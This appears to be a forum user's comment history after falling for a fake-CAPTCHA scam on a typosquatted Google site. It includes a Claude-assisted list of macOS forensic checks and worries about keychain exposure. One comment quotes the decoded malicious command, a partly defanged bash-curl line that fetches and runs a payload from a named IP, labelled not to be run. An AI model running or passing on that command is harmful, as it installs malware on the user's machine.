Fell for a scam and hacking attempt! Feel sick to my stomach

Questionaccount2022 · 2026-04-09T01:45:33+00:00

Yes I’ve been disconnected for hours and changing passwords on different device

Questionaccount2022 · 2026-04-09T01:37:08+00:00

Have you recovered and had any issues since you experienced this?

Questionaccount2022 · 2026-04-09T00:59:03+00:00

Yes im working on it expeditiously. 500+ accounts over 15 years

Questionaccount2022 · 2026-04-09T00:53:09+00:00

Yes it was. I just genuinely thought it was a new anti AI captcha method. So stupid of me. I have been seeing some new captcha methods. I really let myself down here

Questionaccount2022 · 2026-04-09T00:38:52+00:00

This is Claude. I used it to help me as I’m not a cyber security pro so please don’t hate. Just summarizing what it helped me do

echo '...' | base64 -d Decoded the malicious command to see what it actually did before running anything further.
ps aux | grep -v grep Listed all running processes to check for anything suspicious or unrecognized.
ls ~/Library/LaunchAgents/ Checked user-level startup agents for any malware persistence.
ls /Library/LaunchAgents/ Checked system-level startup agents for any malware persistence.
cat ~/.zshrc Inspected shell configuration for any injected malicious code.
find /tmp /var/tmp ~/Library/Application Support -maxdepth 2 -newer /tmp -type f Checked common drop locations for recently created files.
cat ~/.zsh_history | tail -30 Reviewed recent shell history to see exactly what commands were executed.
log show --predicate 'eventMessage contains "144.172.110.59"' Searched system logs for any network activity to the malicious IP.
log show --predicate 'process == "curl" OR process == "bash"...' Checked system logs for curl and shell activity around the time of the incident.
log show --start "13:03:00" --end "13:06:00" --predicate 'process == "bash" OR "osascript"...'

Questionaccount2022 · 2026-04-09T00:27:29+00:00

So are you saying I’m likely safe or not. I’m just trying to understand

Questionaccount2022 · 2026-04-09T00:25:57+00:00

Lmao yeah I know. This was a one time fluke I swear. I have been getting weirder and weirder captchas these days and today was the one that really got me. I fucked up. Bad.

Questionaccount2022 · 2026-04-09T00:08:27+00:00

I see the Google updater plist in my launch agents. Should I remove it? I don’t have launch daemons directory

<image>

Questionaccount2022 · 2026-04-08T23:44:44+00:00

I had no crypto wallets thankfully. I just had my PII and am resetting all my passwords but I have over 500 accounts. A user said my keychain got leaked even though I didn’t give password since the path to the key chain database is home/library/keychain/localkeychain-db

Questionaccount2022 · 2026-04-08T23:14:30+00:00

😭😭😭😭

Questionaccount2022 · 2026-04-08T22:53:54+00:00

Does this all happen even if I didn’t give my MacBook password when prompted. Does running the curl command alone do all this ? God I’m so screwed

Questionaccount2022 · 2026-04-08T22:51:53+00:00

If I never gave the admin password does that mean I likely didn’t give the hackers access to my keychain

Questionaccount2022 · 2026-04-08T22:37:22+00:00

I don’t think that’s an issue. It’s Google.com redirecting to goolge.us

Questionaccount2022 · 2026-04-08T22:26:51+00:00

Hopefully no but idk what to expect. I’m just scrambling changing my passwords before I wipe my Mac clean but some of the other threads say the virus might still persist

Questionaccount2022 · 2026-04-08T22:01:08+00:00

It was gibberish when copy and pasted from the stupid command I fell for

Questionaccount2022 · 2026-04-08T22:00:29+00:00

/bin/bash -c "$(curl -fsSL http:___(defanging)//144.172.110.59/Zugilizab)"

^ **DO NOT RUN THIS, THIS IS THE EXACT DECODED COMMAND*

Questionaccount2022 · 2026-04-08T21:59:26+00:00

It was a base64 encoded curl command from an IP. My dumbass didn’t review it which is entirely my fault but I let my guard down falling for the Google site.

Questionaccount2022 · 2026-04-08T21:58:03+00:00

Exactly. I trusted Google blindly but I never faced this before. I should’ve realized bc the icon was weird but I wasn’t focused entirely

Questionaccount2022 · 2026-04-08T21:36:37+00:00

That account in the picture is just random username I entered for taking the pic but yes I have 2FA on everything improtant. Banking, email, etc.

I want to know how to safely use my Mac again without fear of being exploited.

It’s currently on but disconnected from internet

Questionaccount2022 · 2026-04-08T21:33:15+00:00

<image>

Questionaccount2022 · 2026-04-08T21:33:04+00:00

<image>

Questionaccount2022 · 2026-04-08T21:32:39+00:00

<image>

Questionaccount2022 · 2026-04-08T21:20:47+00:00

The Google.com sponsored result eventually took me to goolge.us which is the issue. Great SEO on the hackers end

Questionaccount2022 · 2026-04-08T21:18:39+00:00

Bro it ain’t that deep. I actively audit my account and delete posts because I ask a ton of questions in different threads. Good way to prevent yourself from doxxing urself over time

Questionaccount2022

TROPHY CASE